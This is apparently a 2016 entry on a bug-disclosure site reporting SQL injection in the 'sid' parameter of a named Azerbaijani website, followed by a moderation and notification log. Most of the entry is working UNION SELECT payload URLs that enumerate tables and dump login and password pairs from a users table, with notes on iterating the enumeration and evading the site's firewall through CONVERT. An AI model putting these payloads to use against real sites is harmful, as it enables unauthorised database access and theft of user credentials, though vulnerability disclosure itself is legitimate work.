Sql Injection index.php?sid= parametr

abtc.az 11 June 2016, 17:57

Detailed information

http://www.abtc.az/index.php?stype=kitabxana&slevel=1&sid= Zererli Sql Kodlari
http://www.abtc.az/index.php?stype=kitabxana&slevel=1&sid=-3 UNION SELECT version(),2 --+- #version
http://www.abtc.az/index.php?stype=kitabxana&slevel=1&sid=-3 UNION SELECT table_name,null from information_schema.tables where tables_schema=database() limit 0,1--+- # Limit 0,1 olan yerde 0 <70 araligina qeder deyisherek db-de olan table_name lere baxa bilerisiz
http://www.abtc.az/index.php?stype=kitabxana&slevel=1&sid=-3 UNION SELECT CONVERT(group_concat(login,0x3a,passw) USING utf8),null from users limit 0,1--+- # users tablesinden datalari alan zaman firewall aktivleshir ve datalari cekmeye imkan vermir, ona gore Convert ile utf-8 e convert ederek datalari almag olar

# Umumulikden Gelen Datalari Saytin Sourccesini Acarag <title> Bu HISSEDE BAXA BILERSIZ </title>

Comments

  • 21 October 2016, 13:35
    Vulnerability status
    Have not any information from source

  • 04 October 2016, 10:02
    Added point to Vulnerability
    For translate of bug gived 9 point to translator

  • 04 October 2016, 10:02
    Added point to Vulnerability
    For translate of bug gived 1 point to translator

  • 16 June 2016, 12:04
    Vulnerability status
    Sended e-mail to source about vulnerability

  • 12 June 2016, 17:54
    Added point to Vulnerability
    Moderator gave 9 point from 10 to vulnerability

  • 12 June 2016, 17:54
    Vulnerability status
    Confirmed by Moderator

  • 11 June 2016, 17:57
    Vulnerability added
    Vulnerability added to BUGemot